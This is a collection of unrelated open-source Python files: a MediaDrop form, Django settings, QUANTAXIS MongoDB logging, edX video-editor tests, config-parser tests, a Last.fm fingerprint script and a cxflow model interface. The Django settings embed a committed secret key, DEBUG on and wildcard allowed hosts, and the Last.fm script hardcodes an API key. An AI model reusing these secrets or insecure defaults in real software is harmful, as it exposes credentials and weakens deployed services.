            ],
        )
    ] + StorageForm.buttons
    # Client-side "add another URL" behavior (see rtmp_server_js above).
    javascript = [rtmp_server_js]
    def display(self, value, engine, **kwargs):
        """Display the form with default values from the given StorageEngine.
        If the value dict is not fully populated, populate any missing entries
        with the values from the given StorageEngine's
        :attr:`_data <mediadrop.lib.storage.StorageEngine._data>` dict.
        :param value: A (sparse) dict of values to populate the form with.
        :type value: dict
        :param engine: An instance of the storage engine implementation.
        :type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass
        """
        rtmp = value.setdefault('rtmp', {})
        rtmp.setdefault('known_servers', engine._data.get('rtmp_server_uris', ()))
        return StorageForm.display(self, value, engine, **kwargs)
    def save_engine_params(self, engine, **kwargs):
        """Map validated field values to engine data.
        Since form widgets may be nested or named differently than the keys
        in the :attr:`mediadrop.lib.storage.StorageEngine._data` dict, it is
        necessary to manually map field values to the data dictionary.
        :type engine: :class:`mediadrop.lib.storage.StorageEngine` subclass
        :param engine: An instance of the storage engine implementation.
        :param \*\*kwargs: Validated and filtered form values.
        :raises formencode.Invalid: If some post-validation error is detected
            in the user input.  This will trigger the same error handling
            behaviour as with the @validate decorator.
        """
        StorageForm.save_engine_params(self, engine, **kwargs)
        rtmp = kwargs.get('rtmp', {})
        rtmp_servers = rtmp.get('known_servers', ())
        # Drop the empty repeater slots; persist only filled-in URLs.
        engine._data['rtmp_server_uris'] = [x for x in rtmp_servers if x]
|
kgao/MediaDrop
|
mediadrop/forms/admin/storage/remoteurls.py
|
Python
|
gpl-3.0
| 4,730
|
"""
Django settings for dron project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to version control — rotate it and load
# from an environment variable before any production deployment.
SECRET_KEY = '^+futs*@p&z(@7n1$aj#2#0@5w^b8pwurw(6p%w164_#l1qwpp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Used to determine if we are using mock.py data or real dronekit data
MODE = "ANDROID" # MOCK, ANDROID, DRONEKIT
# NOTE(review): the wildcard disables Host-header validation; restrict to the
# real hostnames in production.
ALLOWED_HOSTS = [u'*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'maps.apps.MapsConfig',
'droniada.apps.DroniadaConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'dron.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'dron.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Warsaw'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
bladekp/DroniadaDjangoDronekitAPP
|
app/dron/settings.py
|
Python
|
mit
| 3,284
|
#Encoding:utf-8
from QUANTAXIS.QAUtil import QA_util_log_info,QA_Setting
import datetime,time
"""
标准化输出结果,并且给QAAnalysis喂食QAQ
首先接受QASignal打包出来的标准协议
"""
def QA_backtest_standard_record_market(message,client):
    """Persist one bid + market snapshot from a QASignal protocol message.

    message: standard protocol dict (field sketch in the string below);
    client: a MongoDB client — writes into quantaxis.market_history.
    """
    #client=QA_backtest_get_client(QA_Backtest)
    coll=client.quantaxis.market_history
    """
    bid':{
                'price':str(bid['price']),
                'code':str(bid['code']),
                'amount':str(bid['amount']),
                'time':str(bid['time']),
                'towards':str(bid['towards'])
            },
    market:{
        'open':item['open'],
                    'high':item['high'],
                    'low':item['low'],
                    'close':item['close'],
                    'volume':item['volume'],
                    'code':item['code']}
    """
    coll.insert({
        'user':message['header']['session']['user'],
        'strategy_name':message['header']['session']['strategy'],
        'time':datetime.datetime.now(),
        'date_stamp':str(datetime.datetime.now().timestamp()),
        'bid':message['body']['bid'],
        'market':message['body']['market']
    })
def QA_backtest_standard_record_account(message,client):
    """Persist one account-update protocol message into MongoDB.

    message: standard account protocol dict — the header carries the session
        info and the account cookie, the body carries bid/market/account data
        (see the protocol sketch in the string literal below this function).
    client: a MongoDB client — writes into quantaxis.market_history.
    """
    coll=client.quantaxis.market_history
    coll.insert({
        'user':message['header']['session']['user'],
        'strategy_name':message['header']['session']['strategy'],
        'time':datetime.datetime.now(),
        'date_stamp':str(datetime.datetime.now().timestamp()),
        'bid_date':message['body']['bid']['time'],
        'bid':message['body']['bid'],
        'market':message['body']['market'],
        'account':message['body']['account'],
        # BUG FIX: was message['header']['coookie'] (typo) — the protocol
        # names this header key 'cookie', so the old code raised KeyError.
        'cookie':message['header']['cookie']
    })
"""
'header':{
'source':'account',
'cookie':self.account_cookie,
'session':{
'user':update_message['user'],
'strategy':update_message['strategy']
}
},
'body':{
'account':{
'init_assest':self.assets,
'portfolio':self.portfolio,
'history':self.history_trade,
'assest_now':self.assets,
'assest_history':self.total_assest,
'assest_free':self.assets_free,
'assest_fix':self.assets_market_hold_value,
'profit':self.portfit,
'cur_profit':self.cur_profit
},
'bid':update_message['bid'],
'market':update_message['market'],
'time':datetime.datetime.now(),
'date_stamp':str(datetime.datetime.now().timestamp())
"""
|
lijiabogithub/QUANTAXIS
|
QUANTAXIS/QABacktest/QABacktest_standard.py
|
Python
|
mit
| 2,816
|
# -*- coding: utf-8 -*-
"""
Acceptance tests for CMS Video Editor.
"""
from nose.plugins.attrib import attr
from .test_studio_video_module import CMSVideoBaseTest
@attr('shard_6')
class VideoEditorTest(CMSVideoBaseTest):
"""
CMS Video Editor Test Class
"""
    def setUp(self):
        # Delegate all course/unit scaffolding to CMSVideoBaseTest; no extra state here.
        super(VideoEditorTest, self).setUp()
    def _create_video_component(self, subtitles=False):
        """
        Create a video component and navigate to unit page
        Arguments:
            subtitles (bool): Upload subtitles or not
        """
        if subtitles:
            # The .sjson asset is the transcript fixture for the test video.
            self.assets.append('subs__Szu8hVDvgc.srt.sjson')
        self.navigate_to_course_unit()
def test_default_settings(self):
"""
Scenario: User can view Video metadata
Given I have created a Video component
And I edit the component
Then I see the correct video settings and default values
"""
self._create_video_component()
self.edit_component()
self.assertTrue(self.video.verify_settings())
def test_modify_video_display_name(self):
"""
Scenario: User can modify Video display name
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
Then I can modify video display name
And my video display name change is persisted on save
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Component Display Name', 'Transformers')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertTrue(self.video.verify_field_value('Component Display Name', 'Transformers'))
def test_hidden_captions(self):
"""
Scenario: Captions are hidden when "transcript display" is false
Given I have created a Video component with subtitles
And I have set "transcript display" to False
Then when I view the video it does not show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'False', 'select')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_shown_captions(self):
"""
Scenario: Captions are shown when "transcript display" is true
Given I have created a Video component with subtitles
And I have set "transcript display" to True
Then when I view the video it does show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'True', 'select')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
def test_translations_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "uk, zh" translations
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
def test_upload_large_transcript(self):
"""
Scenario: User can upload transcript file with > 1mb size
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "1mb_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('1mb_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_lines())
def test_translations_download_works_w_saving(self):
"""
Scenario: Translations downloading works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And video language menu has "uk, zh" translations
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
zh_unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_download_works_wo_saving(self):
"""
Scenario: Translations downloading works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
Then I can download transcript for "zh" language code, that contains text "好 各位同学"
And I can download transcript for "uk" language code, that contains text "Привіт, edX вітає вас."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
zh_unicode_text = "好 各位同学".decode('utf-8')
self.assertTrue(self.video.download_translation('zh', zh_unicode_text))
uk_unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertTrue(self.video.download_translation('uk', uk_unicode_text))
def test_translations_remove_works_w_saving(self):
"""
Scenario: Translations removing works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
And video language menu has "uk, zh" translations
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
Then I remove translation for "zh" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.video.remove_translation('uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_remove_works_wo_saving(self):
"""
Scenario: Translations removing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I see translations for "uk"
Then I remove translation for "uk" language code
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.assertEqual(self.video.translations(), ['uk'])
self.video.remove_translation('uk')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_clearing_works_w_saving(self):
"""
Scenario: Translations clearing works correctly w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
And video language menu has "uk, zh" translations
And I edit the component
And I open tab "Advanced"
And I see translations for "uk, zh"
And I click button "Clear"
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), ['zh', 'uk'])
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh', 'uk'])
self.video.click_button('translations_clear')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_clearing_works_wo_saving(self):
"""
Scenario: Translations clearing works correctly w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|zh |chinese_transcripts.srt|
And I click button "Clear"
And I save changes
Then when I view the video it does not show the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.video.click_button('translations_clear')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_cannot_upload_sjson_translation(self):
"""
Scenario: User cannot upload translations in sjson format
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "uk" language code
And I try to upload transcript file "subs__Szu8hVDvgc.srt.sjson"
Then I see validation error "Only SRT files can be uploaded. Please select a file ending in .srt to upload."
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('uk')
self.video.upload_asset('subs__Szu8hVDvgc.srt.sjson', asset_type='transcript')
error_msg = 'Only SRT files can be uploaded. Please select a file ending in .srt to upload.'
self.assertEqual(self.video.upload_status_message, error_msg)
def test_replace_translation_w_save(self):
"""
Scenario: User can easy replace the translation by another one w/ preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_replace_translation_wo_save(self):
"""
Scenario: User can easy replace the translation by another one w/o preliminary saving
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
And I replace transcript file for "zh" language code by "uk_transcripts.srt"
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.replace_translation('zh', 'uk', 'uk_transcripts.srt')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_translation_upload_remove_upload(self):
"""
Scenario: Upload "zh" file "A" -> Remove "zh" -> Upload "zh" file "B"
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I see translations for "zh"
Then I remove translation for "zh" language code
And I upload transcript file "uk_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "Привіт, edX вітає вас." text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.assertEqual(self.video.translations(), ['zh'])
self.video.remove_translation('zh')
self.video.upload_translation('uk_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "Привіт, edX вітає вас.".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
def test_select_language_twice(self):
"""
Scenario: User cannot select the same language twice
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I click button "Add"
And I choose "zh" language code
And I click button "Add"
Then I cannot choose "zh" language code
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.video.click_button('translation_add')
self.video.select_translation_language('zh')
self.assertEqual(self.video.translations(), [u'zh', u''])
def test_table_of_contents(self):
"""
Scenario: User can see Abkhazian (ab) language option at the first position
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript files:
|lang_code|filename |
|uk |uk_transcripts.srt |
|table |chinese_transcripts.srt|
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "table, uk" translations
And I see video language with code "table" at position "0"
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.video.upload_translation('chinese_transcripts.srt', 'ab')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "好 各位同学".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages.keys(), [u'ab', u'uk'])
self.assertEqual(self.video.caption_languages.keys()[0], 'ab')
def test_upload_transcript_with_BOM(self):
"""
Scenario: User can upload transcript file with BOM(Byte Order Mark) in it.
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts_with_BOM.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "莎拉·佩林 (Sarah Palin)" text in the captions
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts_with_BOM.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = "莎拉·佩林 (Sarah Palin)".decode('utf-8')
self.assertIn(unicode_text, self.video.captions_lines())
def test_simplified_and_traditional_chinese_transcripts_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "simplified_chinese.srt" for "zh_HANS" language code
And I save changes
Then when I view the video it does show the captions
And I see "在线学习是革" text in the captions
And I edit the component
And I open tab "Advanced"
And I upload transcript file "traditional_chinese.srt" for "zh_HANT" language code
And I save changes
Then when I view the video it does show the captions
And I see "在線學習是革" text in the captions
And video subtitle menu has 'zh_HANS', 'zh_HANT' translations for 'Simplified Chinese'
and 'Traditional Chinese' respectively
"""
self._create_video_component()
langs_info = [
('zh_HANS', 'simplified_chinese.srt', '在线学习是革'),
('zh_HANT', 'traditional_chinese.srt', '在線學習是革')
]
for lang_code, lang_file, lang_text in langs_info:
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation(lang_file, lang_code)
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
# If there is only one language then there will be no subtitle/captions menu
if lang_code == 'zh_HANT':
self.video.select_language(lang_code)
unicode_text = lang_text.decode('utf-8')
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(self.video.caption_languages, {'zh_HANS': 'Simplified Chinese', 'zh_HANT': 'Traditional Chinese'})
|
IONISx/edx-platform
|
common/test/acceptance/tests/video/test_studio_video_editor.py
|
Python
|
agpl-3.0
| 24,711
|
"""
Tests for configuration file parsers, ...
"""
from ConfigParser import RawConfigParser
import io
import os
import textwrap
import pytest
from ardomino.conf import (process_conf_files,
find_configuration_files,
create_conf_parser)
@pytest.fixture
def conf_dir(tmpdir):
    """Create a temp dir holding three *.ini conf files plus one non-ini
    file that the parser helpers are expected to ignore."""
    with open(str(tmpdir.join('food.ini')), 'w') as f:
        f.write(textwrap.dedent("""
            [food:Egg]
            taste = Great
            [food:Bacon]
            taste = Delicious
            [food:Spam]
            taste = Sublime
            """))
    with open(str(tmpdir.join('beverages.ini')), 'w') as f:
        f.write(textwrap.dedent("""
            [beverage:Coffee]
            color = black
            [beverage:Milk]
            color = white
            [beverage:Tea]
            color = brown
            """))
    with open(str(tmpdir.join('pets.ini')), 'w') as f:
        f.write(textwrap.dedent("""
            [pet:Cat]
            says = Meow
            [pet:Dog]
            says = Bark
            [pet:Snake]
            says =
            """))
    # Deliberately well-formed INI content in a .txt file: discovery must
    # filter by extension, not by content.
    with open(str(tmpdir.join('not-a-conf-file.txt')), 'w') as f:
        f.write(textwrap.dedent("""
            [this-is:not]
            what = a configuration file!
            """))
    return tmpdir
def test_create_conf_parser(conf_dir):
    """The parser picks up sections from every .ini file and skips others."""
    sections = create_conf_parser(str(conf_dir)).sections()
    for expected in ('pet:Cat', 'food:Bacon', 'beverage:Coffee'):
        assert expected in sections
    assert 'this-is:not' not in sections
def test_find_configuration_files(conf_dir):
    """Discovery returns exactly the three .ini files."""
    expected = [str(conf_dir.join(name))
                for name in ('beverages.ini', 'food.ini', 'pets.ini')]
    assert sorted(find_configuration_files(str(conf_dir))) == expected
def test_process_conf_files():
    """Sections named ``<type>:<name>`` are regrouped into a nested
    ``{type: {name: {option: value}}}`` dict."""
    example_conf = textwrap.dedent("""
    [food:Egg]
    description = A nice round egg
    [food:Spam]
    description = Spam Spam Spam Spam Spam!
    [person:JohnDoe]
    first_name = John
    last_name = Doe
    """)
    expected_result = {
        'food': {
            'Egg': {'description': 'A nice round egg'},
            'Spam': {'description': 'Spam Spam Spam Spam Spam!'},
        },
        'person': {
            'JohnDoe': {
                'first_name': 'John',
                'last_name': 'Doe',
            }
        }
    }
    conf_parser = RawConfigParser()
    conf_parser.readfp(io.BytesIO(example_conf))
    result = process_conf_files(conf_parser)
    assert result == expected_result
    # Removed a dead `pass` statement that followed the final assert.
def test_process_conf_dir(conf_dir):
    """End-to-end: parse the fixture directory and verify the grouping."""
    grouped = process_conf_files(create_conf_parser(str(conf_dir)))
    assert sorted(grouped) == ['beverage', 'food', 'pet']
    assert sorted(grouped['beverage']) == ['Coffee', 'Milk', 'Tea']
    assert sorted(grouped['food']) == ['Bacon', 'Egg', 'Spam']
    assert sorted(grouped['pet']) == ['Cat', 'Dog', 'Snake']
    assert grouped['food']['Bacon'] == {'taste': 'Delicious'}
    assert grouped['food']['Spam'] == {'taste': 'Sublime'}
|
rshk/ardomino-api
|
ardomino/tests/test_configuration.py
|
Python
|
bsd-3-clause
| 3,008
|
#!/usr/bin/env python
"""A simple program for using pylastfp to fingerprint and look up
metadata for MP3 files. Usage:
$ python lastmatch.py [-m] mysterious_music.mp3
By default, the script uses Gstreamer to decode audio. The -m flag
makes it use MAD instead (which, of course, only works on MPEG audio
such as MP3). To use the script, of course, you'll need to have
either Gstreamer (and its Python bindings) or pymad installed.
"""
from __future__ import print_function
import sys
import os
# Just a little trickery to avoid importing the "lastfp" package that's
# in the source distribution, because it won't contain the built
# _fplib.so extension module. We need to import from the built verison,
# and this script is likely to be run from the distribution root.
for path in '', os.path.abspath(os.path.dirname(__file__)):
if path in sys.path:
sys.path.remove(path)
import lastfp
# This API key is specifically for this script, lastmatch.py. If you
# use pylastfp in your project, you'll want to generate your own. It's
# easy and free!
# http://last.fm/api/account
API_KEY = '7821ee9bf9937b7f94af2abecced8ddd'
if __name__ == '__main__':
    args = sys.argv[1:]
    if not args:
        print("usage: python lastmatch.py [-m] mysterious_music.mp3 [...]")
        sys.exit(1)
    # -m selects the MAD decoder (MPEG audio only); default is Gstreamer.
    if args[0] == '-m':
        match_func = lastfp.mad_match
        args.pop(0)
    else:
        match_func = lastfp.gst_match
    for path in args:
        path = os.path.abspath(os.path.expanduser(path))
        # Perform match.
        try:
            xml = match_func(API_KEY, path)
        except lastfp.ExtractionError:
            print('fingerprinting failed!')
            sys.exit(1)
        except lastfp.QueryError:
            print('could not match fingerprint!')
            sys.exit(1)
        # NOTE(review): exiting on first failure aborts any remaining files,
        # even though multiple paths are accepted — confirm this is intended.
        # Show results.
        matches = lastfp.parse_metadata(xml)
        for track in matches:
            print('%f: %s - %s' % (track['rank'], track['artist'],
                                   track['title']))
|
sampsyo/pylastfp
|
lastmatch.py
|
Python
|
lgpl-3.0
| 2,040
|
"""
This module contains the definition of a model trainable in **cxflow** framework.
"""
from abc import abstractmethod, ABCMeta
from typing import Iterable, Optional
from ..datasets import AbstractDataset, StreamWrapper
from ..types import Batch
class AbstractModel(metaclass=ABCMeta):
    """
    Abstract machine learning model which exposes input and output names, run and save methods.
    `AbstractModel` implementations are trainable with :py:class:`cxflow.MainLoop`.
    """
    @abstractmethod
    def __init__(self, dataset: Optional[AbstractDataset], log_dir: str, restore_from: Optional[str]=None, **kwargs):
        """
        Model constructor interface.
        Additional parameters (currently covered by ``**kwargs``) are passed
        according to the configuration ``model`` section.
        :param dataset: dataset object
        :param log_dir: existing directory in which all output files should be stored
        :param restore_from: information passed to the model constructor (backend-specific);
            usually a directory in which the trained model is stored
        :param kwargs: configuration section ``model``
        """
        pass
    @property
    @abstractmethod
    def input_names(self) -> Iterable[str]:
        """List of model input names."""
        pass
    @property
    @abstractmethod
    def output_names(self) -> Iterable[str]:
        """List of model output names."""
        pass
    @abstractmethod
    def run(self, batch: Batch, train: bool, stream: StreamWrapper) -> Batch:
        """
        Run feed-forward pass with the given batch and return the results as dict.
        When ``train=True``, also update parameters.
        :param batch: batch to be processed
        :param train: ``True`` if this batch should be used for model update, ``False`` otherwise
        :param stream: stream wrapper (useful for precise buffer management)
        :return: results dict
        """
        pass
    @abstractmethod
    def save(self, name_suffix: str) -> str:
        """
        Save the model parameters with the given ``name_suffix``.
        :param name_suffix: name suffix to be appended to the saved model
        :return: path to the saved file/dir
        """
        pass
    @property
    @abstractmethod
    def restore_fallback(self) -> str:
        """
        Return the fully-qualified name of the fallback restore class (e.g. ``module.submodule.BaseClass``).
        When restoring a model, **cxflow** tries to use the fallback class if the construction of the model
        object specified in `model` configuration section fails.
        :return: fully-qualified name of the fallback restore class
        """
        pass
|
Cognexa/cxflow
|
cxflow/models/abstract_model.py
|
Python
|
mit
| 2,738
|
from flask_marshmallow import Marshmallow
from models import Feature, Client, Area
# Single Marshmallow extension instance shared by all schemas below.
